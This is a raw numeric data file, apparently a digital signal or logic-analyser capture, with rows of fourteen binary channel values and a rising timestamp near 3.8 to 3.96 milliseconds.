1,0,1,1,0,1,0,0,0,1,0,0,1,0,3.8263400e-03 1,0,1,1,0,1,0,0,0,1,0,0,0,0,3.8263640e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8263720e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8263880e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8264120e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8264360e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8264680e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8264880e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8265160e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8265400e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8265640e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8265880e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8266120e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8266360e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8266680e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8266880e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8267160e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8267400e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8267640e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8267880e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8268120e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8268360e-03 1,0,1,1,0,1,0,0,0,1,0,0,0,0,3.8268680e-03 1,0,1,1,0,1,0,0,0,1,0,0,1,0,3.8269160e-03 1,0,1,1,0,1,0,0,0,1,0,0,0,0,3.8269400e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8269480e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8269640e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8269880e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8270120e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8270360e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8270680e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8270880e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8271160e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8271400e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8271640e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8271880e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8272120e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8272360e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8272680e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8272880e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8273400e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8273640e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8273880e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8274120e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8274360e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8274680e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8274880e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8275120e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8275400e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8275640e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8275880e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8276120e-03 1,0,1,1,0,1,0,0,0,1,0,0,0,0,3.8276200e-03 1,0,1,1,0,1,0,0,0,1,0,0,1,0,3.8276360e-03 1,0,1,1,0,1,0,0,0,1,0,0,0,0,3.8276680e-03 1,0,1,1,0,1,0,0,0,1,0,0,1,0,3.8276880e-03 1,0,1,1,0,1,0,0,0,1,0,0,0,0,3.8277160e-03 1,0,1,1,0,1,0,0,0,1,0,0,1,0,3.8277400e-03 1,0,1,1,0,1,0,0,0,1,0,0,0,0,3.8277640e-03 1,0,1,1,0,1,0,0,0,1,0,0,1,0,3.8277880e-03 1,0,1,1,0,1,0,0,0,1,0,0,0,0,3.8278120e-03 1,0,1,1,0,1,0,0,0,1,0,0,1,0,3.8278360e-03 1,0,1,1,0,1,0,0,0,1,0,0,0,0,3.8278680e-03 1,0,1,1,0,1,0,0,0,1,0,0,1,0,3.8279160e-03 1,0,1,1,0,1,0,0,0,1,0,0,0,0,3.8279400e-03 1,0,1,1,0,1,0,0,0,0,0,0,0,0,3.8279440e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8279480e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8279640e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8279880e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8280120e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8280360e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8280680e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8280880e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8281160e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8281400e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8281640e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8281880e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8282120e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8282400e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8282680e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8282880e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8283160e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8283400e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8283640e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8283880e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8284120e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8284400e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8284680e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8284920e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8285160e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8285400e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8285640e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8285880e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8286160e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8286400e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8286680e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8286920e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8287160e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8287400e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8287640e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8287880e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8288440e-03 1,0,1,1,0,0,0,0,0,1,0,0,0,0,3.8288680e-03 1,0,1,1,0,1,0,0,0,1,0,0,0,0,3.8288720e-03 1,0,1,1,0,1,0,0,0,1,0,0,1,0,3.8289160e-03 1,0,1,1,0,1,0,0,0,1,0,0,0,0,3.8289400e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8289480e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8289640e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8289880e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8290160e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8290400e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8290680e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8290920e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8291160e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8291400e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8291640e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8291880e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8292160e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8292400e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8292680e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8292920e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8293160e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8293400e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8293640e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8293880e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8294160e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8294400e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8294680e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8294920e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8295400e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8295640e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8295880e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8296160e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8296400e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8296680e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8296920e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8297160e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8297400e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8297640e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8297880e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8298160e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8298400e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8298680e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8298920e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8299160e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8299400e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8299640e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8299880e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8300160e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8300400e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8300680e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8300920e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8301160e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8301400e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8301640e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8301880e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8302120e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8302400e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8302680e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8302920e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8303160e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8303400e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8303640e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8303880e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8304120e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8304400e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8304680e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8304920e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8305160e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8305400e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8305640e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8305880e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8306120e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8306400e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8306680e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8306920e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8307160e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8307400e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8307640e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8307880e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8308120e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8308400e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8308680e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8308880e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8309160e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8309400e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8309640e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8309880e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8310120e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8310400e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8310680e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8310880e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8311120e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8311400e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8311640e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8311880e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8312120e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8312400e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8312680e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8312880e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8313160e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8313400e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8313640e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8313880e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8314120e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8314400e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8314680e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8314880e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8315160e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8315400e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8315640e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8315880e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8316120e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8316400e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8316680e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8316880e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8317160e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8317400e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8317640e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8317880e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8318120e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8318400e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8318680e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8318920e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8319160e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8319400e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8319640e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8319880e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8320120e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8320400e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8320680e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8320920e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8321160e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8321400e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8321640e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8321880e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8322120e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8322400e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8322680e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8322920e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8323120e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8323400e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8323640e-03 1,0,1,1,0,1,0,0,0,1,0,0,0,0,3.8323720e-03 1,0,1,1,0,1,0,0,0,1,0,0,0,1,3.9571240e-03 0,0,1,1,0,1,0,0,0,1,0,0,0,1,3.9573440e-03 0,1,1,1,0,1,0,0,0,1,0,0,0,1,3.9573640e-03 0,1,1,1,0,1,0,0,0,1,0,1,0,1,3.9573960e-03 0,1,1,1,0,1,0,0,0,1,0,0,0,1,3.9574200e-03 0,1,1,1,0,1,0,0,0,1,0,0,1,1,3.9577160e-03 0,1,1,1,0,1,0,0,0,1,0,0,0,1,3.9577440e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,1,3.9577480e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,1,3.9577680e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,1,3.9577960e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,1,3.9578200e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,1,3.9578440e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,1,3.9578680e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,1,3.9578920e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,1,3.9579160e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,1,3.9579440e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9579560e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9579680e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9579960e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9580200e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9580440e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9580680e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9580920e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9581440e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9581680e-03 0,1,1,1,0,1,0,0,0,1,0,0,0,0,3.9581720e-03 0,1,1,1,0,1,0,0,0,1,0,0,1,0,3.9581960e-03 0,1,1,1,0,1,0,0,0,1,0,0,0,0,3.9582200e-03 0,1,1,1,0,1,0,0,0,1,0,0,1,0,3.9582680e-03 0,1,1,1,0,1,0,0,0,1,0,0,0,0,3.9582920e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9583000e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9583160e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9583440e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9583680e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9583960e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9584160e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9584400e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9584680e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9584920e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9585160e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9585400e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9585640e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9585880e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9586160e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9586400e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9586680e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9586920e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9587160e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9587400e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9587640e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9587880e-03 0,1,1,1,0,1,0,0,0,1,0,0,0,0,3.9587960e-03 0,1,1,1,0,1,0,0,0,1,0,0,1,0,3.9588440e-03 0,1,1,1,0,1,0,0,0,1,0,0,0,0,3.9588680e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9588760e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9588920e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9589160e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9589400e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9589640e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9589880e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9590160e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9590400e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9590680e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9590920e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9591160e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9591400e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9591640e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9591880e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9592160e-03 0,1,1,1,0,1,0,0,0,1,0,0,0,0,3.9592200e-03 0,1,1,1,0,1,0,0,0,1,0,0,1,0,3.9592680e-03 0,1,1,1,0,1,0,0,0,1,0,0,0,0,3.9592920e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9593000e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9593160e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9593400e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9593640e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9593880e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9594160e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9594400e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9594680e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9594920e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9595160e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9595400e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9595640e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9595880e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9596160e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9596400e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9596680e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9596920e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9597160e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9597400e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9597920e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9598160e-03 0,1,1,1,0,1,0,0,0,1,0,0,0,0,3.9598200e-03 0,1,1,1,0,1,0,0,0,1,0,0,1,0,3.9598440e-03 0,1,1,1,0,1,0,0,0,1,0,0,0,0,3.9598680e-03 0,1,1,1,0,1,0,0,0,0,0,0,0,0,3.9598720e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9598760e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9598920e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9599160e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9599400e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9599640e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9599880e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9600160e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9600400e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9600680e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9600920e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9601160e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9601400e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9601640e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9601880e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9602160e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9602400e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9602680e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9602920e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9603160e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9603400e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9603640e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9603880e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9604160e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9604400e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9604680e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9604920e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9605160e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9605400e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9605640e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9605880e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9606160e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9606400e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9606680e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9607160e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9607400e-03 0,1,1,1,0,1,0,0,0,1,0,0,0,0,3.9607480e-03 0,1,1,1,0,1,0,0,0,1,0,0,1,0,3.9607640e-03 0,1,1,1,0,1,0,0,0,1,0,0,0,0,3.9607880e-03 0,1,1,1,0,1,0,0,0,1,0,0,1,0,3.9608440e-03 0,1,1,1,0,1,0,0,0,1,0,0,0,0,3.9608680e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9608760e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9608920e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9609160e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9609400e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9609640e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9609880e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9610160e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9610400e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9610680e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9610920e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9611160e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9611400e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9611640e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9611880e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9612160e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9612400e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9612680e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9612920e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9613160e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9613400e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9613640e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.9613880e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.9614160e-03 0,1,1,1,0,1,0,0,0,1,0,0,0,0,3.9614200e-03 